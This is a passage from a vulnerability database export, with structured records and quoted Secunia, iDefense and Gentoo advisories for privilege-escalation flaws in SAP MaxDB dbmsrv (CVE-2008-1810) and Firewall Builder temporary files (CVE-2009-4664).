      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200808-0238",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "maxdb",
        "scope": "eq",
        "trust": 2.1,
        "vendor": "sap",
        "version": "7.6.03.15"
      },
      {
        "model": "kernel",
        "scope": null,
        "trust": 0.6,
        "vendor": "linux",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "30474"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2008-005690"
      },
      {
        "db": "NVD",
        "id": "CVE-2008-1810"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200808-004"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:sap:maxdb:7.6.03.15:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2008-1810"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "iDEFENSE",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200808-004"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2008-1810",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 4.4,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.4,
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 4.4,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2008-1810",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2008-1810",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200808-004",
            "trust": 0.6,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2008-005690"
      },
      {
        "db": "NVD",
        "id": "CVE-2008-1810"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200808-004"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Untrusted search path vulnerability in dbmsrv in SAP MaxDB 7.6.03.15 on Linux allows local users to gain privileges via a modified PATH environment variable. SAP MaxDB is prone to a local privilege-escalation vulnerability that occurs in the \u0027dbmsrv\u0027 process because the application fails to sufficiently sanitize user-supplied input. \nAn attacker can exploit this issue to execute arbitrary code with \u0027sdb:sdba\u0027 privileges. Successfully exploiting this issue will compromise the affected application and possibly the underlying computer. \nSAP MaxDB 7.6.03.15 on Linux is vulnerable; other versions running on different platforms may also be affected. ----------------------------------------------------------------------\n\nWant a new job?\n\nhttp://secunia.com/secunia_security_specialist/\nhttp://secunia.com/hardcore_disassembler_and_reverse_engineer/\n\nInternational Partner Manager - Project Sales in the IT-Security\nIndustry:\nhttp://corporate.secunia.com/about_secunia/64/\n\n----------------------------------------------------------------------\n\nTITLE:\nMaxDB \"dbmsrv\" Privilege Escalation Vulnerability\n\nSECUNIA ADVISORY ID:\nSA31318\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/31318/\n\nCRITICAL:\nLess critical\n\nIMPACT:\nPrivilege escalation\n\nWHERE:\nLocal system\n\nSOFTWARE:\nMaxDB 7.x\nhttp://secunia.com/product/4012/\n\nDESCRIPTION:\nA vulnerability has been reported in MaxDB, which can be exploited by\nmalicious, local users to gain escalated privileges. \n\nPROVIDED AND/OR DISCOVERED BY:\nanonymous researcher, reported via iDefense\n\nORIGINAL ADVISORY:\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=729\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. iDefense Security Advisory 07.30.08\nhttp://labs.idefense.com/intelligence/vulnerabilities/\nJul 30, 2008\n\nI. BACKGROUND\n\nSAP\u0027s MaxDB is a database software product. MaxDB was released as open\nsource from version 7.5 up to version 7.6.00. Later versions are no\nlonger open source but are available for download from the SAP SDN\nwebsite (sdn.sap.com) as a community edition with free community\nsupport for public use beyond the scope of SAP applications. The\n\"dbmsrv\" program is set-uid \"sdb\", set-gid \"sdba\", and installed by\ndefault. For more information, visit the product\u0027s website at the\nfollowing URL. \n\nhttps://www.sdn.sap.com/irj/sdn/maxdb\n\nII. \n\nWhen a local user runs the \"dbmcli\" program, the MaxDB executes a\n\"dbmsrv\" process on the user\u0027s behalf. The \"dbmsrv\" process, which is\nresponsible for executing user commands, runs as the user \"sdb\" with\ngroup \"sdba\". \n\nIII. \n\nIV. Other versions may also be vulnerable. \n\nV. WORKAROUND\n\niDefense is currently unaware of any workaround for this issue. \n\nVI. VENDOR RESPONSE\n\nSAP AG has addressed this vulnerability by releasing a new version of\nMaxDB. For more information, consult SAP note 1178438. \n\nVII. CVE INFORMATION\n\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\nname CVE-2008-1810 to this issue. This is a candidate for inclusion in\nthe CVE list (http://cve.mitre.org/), which standardizes names for\nsecurity problems. \n\nVIII. DISCLOSURE TIMELINE\n\n03/27/2008  Initial vendor notification\n04/01/2008  Initial vendor response\n07/30/2008  Coordinated public disclosure\n\nIX. CREDIT\n\nThe discoverer of this vulnerability wishes to remain anonymous. \n\nGet paid for vulnerability research\nhttp://labs.idefense.com/methodology/vulnerability/vcp.php\n\nFree tools, research and upcoming events\nhttp://labs.idefense.com/\n\nX. LEGAL NOTICES\n\nCopyright \\xa9 2008 iDefense, Inc. \n\nPermission is granted for the redistribution of this alert\nelectronically. It may not be edited in any way without the express\nwritten consent of iDefense. If you wish to reprint the whole or any\npart of this alert in any other medium other than electronically,\nplease e-mail customerservice@idefense.com for permission. \n\nDisclaimer: The information in the advisory is believed to be accurate\nat the time of publishing based on currently available information. Use\nof the information constitutes acceptance for use in an AS IS condition. \n There are no warranties with regard to this information. Neither the\nauthor nor the publisher accepts any liability for any direct,\nindirect, or consequential loss or damage arising from use of, or\nreliance on, this information",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2008-1810"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2008-005690"
      },
      {
        "db": "BID",
        "id": "30474"
      },
      {
        "db": "PACKETSTORM",
        "id": "68727"
      },
      {
        "db": "PACKETSTORM",
        "id": "68694"
      }
    ],
    "trust": 2.07
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2008-1810",
        "trust": 2.8
      },
      {
        "db": "BID",
        "id": "30474",
        "trust": 1.9
      },
      {
        "db": "SECUNIA",
        "id": "31318",
        "trust": 1.7
      },
      {
        "db": "VUPEN",
        "id": "ADV-2008-2267",
        "trust": 1.6
      },
      {
        "db": "SECTRACK",
        "id": "1020585",
        "trust": 1.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2008-005690",
        "trust": 0.8
      },
      {
        "db": "IDEFENSE",
        "id": "20080730 SAP MAXDB DBMSRV UNTRUSTED EXECUTION PATH VULNERABILITY",
        "trust": 0.6
      },
      {
        "db": "XF",
        "id": "44125",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200808-004",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "68727",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "68694",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "30474"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2008-005690"
      },
      {
        "db": "PACKETSTORM",
        "id": "68727"
      },
      {
        "db": "PACKETSTORM",
        "id": "68694"
      },
      {
        "db": "NVD",
        "id": "CVE-2008-1810"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200808-004"
      }
    ]
  },
  "id": "VAR-200808-0238",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.1359447
  },
  "last_update_date": "2023-12-18T13:35:14.124000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://maxdb.sap.com/"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2008-005690"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-264",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2008-005690"
      },
      {
        "db": "NVD",
        "id": "CVE-2008-1810"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.0,
        "url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=729"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/31318"
      },
      {
        "trust": 1.6,
        "url": "http://www.securityfocus.com/bid/30474"
      },
      {
        "trust": 1.6,
        "url": "http://www.securitytracker.com/id?1020585"
      },
      {
        "trust": 1.0,
        "url": "http://www.vupen.com/english/advisories/2008/2267/references"
      },
      {
        "trust": 1.0,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/44125"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-1810"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2008-1810"
      },
      {
        "trust": 0.6,
        "url": "http://xforce.iss.net/xforce/xfdb/44125"
      },
      {
        "trust": 0.6,
        "url": "http://www.frsirt.com/english/advisories/2008/2267/references"
      },
      {
        "trust": 0.4,
        "url": "https://www.sdn.sap.com/irj/sdn/maxdb"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/494990"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/product/4012/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/secunia_security_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/hardcore_disassembler_and_reverse_engineer/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/31318/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/secunia_security_specialist/"
      },
      {
        "trust": 0.1,
        "url": "http://corporate.secunia.com/about_secunia/64/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/about_secunia_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/),"
      },
      {
        "trust": 0.1,
        "url": "http://labs.idefense.com/intelligence/vulnerabilities/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-1810"
      },
      {
        "trust": 0.1,
        "url": "http://labs.idefense.com/methodology/vulnerability/vcp.php"
      },
      {
        "trust": 0.1,
        "url": "http://labs.idefense.com/"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "30474"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2008-005690"
      },
      {
        "db": "PACKETSTORM",
        "id": "68727"
      },
      {
        "db": "PACKETSTORM",
        "id": "68694"
      },
      {
        "db": "NVD",
        "id": "CVE-2008-1810"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200808-004"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "BID",
        "id": "30474"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2008-005690"
      },
      {
        "db": "PACKETSTORM",
        "id": "68727"
      },
      {
        "db": "PACKETSTORM",
        "id": "68694"
      },
      {
        "db": "NVD",
        "id": "CVE-2008-1810"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200808-004"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2008-07-31T00:00:00",
        "db": "BID",
        "id": "30474"
      },
      {
        "date": "2012-12-20T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2008-005690"
      },
      {
        "date": "2008-08-01T19:48:32",
        "db": "PACKETSTORM",
        "id": "68727"
      },
      {
        "date": "2008-07-31T22:25:13",
        "db": "PACKETSTORM",
        "id": "68694"
      },
      {
        "date": "2008-08-01T14:41:00",
        "db": "NVD",
        "id": "CVE-2008-1810"
      },
      {
        "date": "2008-07-31T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200808-004"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2008-07-31T22:07:00",
        "db": "BID",
        "id": "30474"
      },
      {
        "date": "2012-12-20T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2008-005690"
      },
      {
        "date": "2017-08-08T01:30:28.387000",
        "db": "NVD",
        "id": "CVE-2008-1810"
      },
      {
        "date": "2008-09-11T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200808-004"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "30474"
      },
      {
        "db": "PACKETSTORM",
        "id": "68727"
      },
      {
        "db": "PACKETSTORM",
        "id": "68694"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200808-004"
      }
    ],
    "trust": 1.1
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Run on  SAP MaxDB of  dbmsrv Vulnerability gained in",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2008-005690"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "permissions and access control",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200808-004"
      }
    ],
    "trust": 0.6
  }
}

var-201003-0011
Vulnerability from variot

Firewall Builder 3.0.4, 3.0.5, and 3.0.6, when running on Linux, allows local users to gain privileges via a symlink attack on an unspecified temporary file that is created by the iptables script. Firewall Builder creates temporary files in an insecure manner. An attacker with local access could potentially exploit this issue to perform symbolic-link attacks, overwriting arbitrary files in the context of the affected application. Successfully mounting a symlink attack may allow the attacker to delete or corrupt sensitive files or to execute arbitrary code with elevated privileges. Firewall Builder 3.0.4, 3.0.5, and 3.0.6 are vulnerable; other versions may also be affected. ----------------------------------------------------------------------

Do you have VARM strategy implemented?

(Vulnerability Assessment Remediation Management)

If not, then implement it through the most reliable vulnerability intelligence source on the market.

Implement it through Secunia.

For more information visit: http://secunia.com/advisories/business_solutions/

Alternatively request a call from a Secunia representative today to discuss how we can help you with our capabilities contact us at: sales@secunia.com


TITLE: Firewall Builder Insecure Temporary Files

SECUNIA ADVISORY ID: SA36809

VERIFY ADVISORY: http://secunia.com/advisories/36809/

DESCRIPTION: A security issue has been reported in Firewall Builder, which can be exploited by malicious, local users to perform certain actions with escalated privileges. This can be exploited to e.g. overwrite arbitrary files via symlink attacks.

Note: Only scripts setting iptable's static routing configuration are affected.

The security issue is reported in versions 3.0.4, 3.0.5, and 3.0.6.

SOLUTION: Update to version 3.0.7.

PROVIDED AND/OR DISCOVERED BY: Reported by the vendor.

ORIGINAL ADVISORY: http://blog.fwbuilder.org/2009/09/firewall-builder-v307-released.html


About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.

Subscribe: http://secunia.com/advisories/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.


Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org


.

Background

Firewall Builder is a GUI for easy management of multiple firewall platforms.

Workaround

There is no known workaround at this time.

Resolution

All Firewall Builder users should upgrade to the latest version:

# emerge --sync # emerge --ask --oneshot --verbose ">=net-firewall/fwbuilder-3.0.7"

NOTE: This is a legacy GLSA. Updates for all affected architectures are available since March 09, 2010. It is likely that your system is already no longer affected by this issue.

References

[ 1 ] CVE-2008-4956 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4956 [ 2 ] CVE-2009-4664 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-4664

Availability

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-201201-11.xml

Concerns?

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

License

Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5 . ----------------------------------------------------------------------

Secunia integrated with Microsoft WSUS http://secunia.com/blog/71/


TITLE: Fedora update for fwbuilder and libfwbuilder

SECUNIA ADVISORY ID: SA38585

VERIFY ADVISORY: http://secunia.com/advisories/38585/

DESCRIPTION: Fedora has issued an update for fwbuilder and libfwbuilder.

For more information: SA36809

SOLUTION: Apply updated packages using the yum utility ("yum update fwbuilder libfwbuilder")

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201003-0011",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "firewall builder",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "fwbuilder",
        "version": "3.0.4"
      },
      {
        "model": "firewall builder",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "fwbuilder",
        "version": "3.0.5"
      },
      {
        "model": "firewall builder",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "fwbuilder",
        "version": "3.0.6"
      },
      {
        "model": "firewall builder",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "fwbuilder",
        "version": "and  3.0.6"
      },
      {
        "model": "kernel",
        "scope": null,
        "trust": 0.8,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "firewall builder",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netcitadel",
        "version": "3.0.6"
      },
      {
        "model": "firewall builder",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netcitadel",
        "version": "3.0.5"
      },
      {
        "model": "firewall builder",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netcitadel",
        "version": "3.0.4"
      },
      {
        "model": "linux",
        "scope": null,
        "trust": 0.3,
        "vendor": "gentoo",
        "version": null
      },
      {
        "model": "firewall builder",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "netcitadel",
        "version": "3.0.7"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "36468"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-003670"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-4664"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201003-033"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:fwbuilder:firewall_builder:3.0.5:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:fwbuilder:firewall_builder:3.0.6:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:fwbuilder:firewall_builder:3.0.4:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2009-4664"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "NetCitadel",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201003-033"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2009-4664",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 3.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.4,
            "impactScore": 4.9,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "LOW",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 3.3,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2009-4664",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Low",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
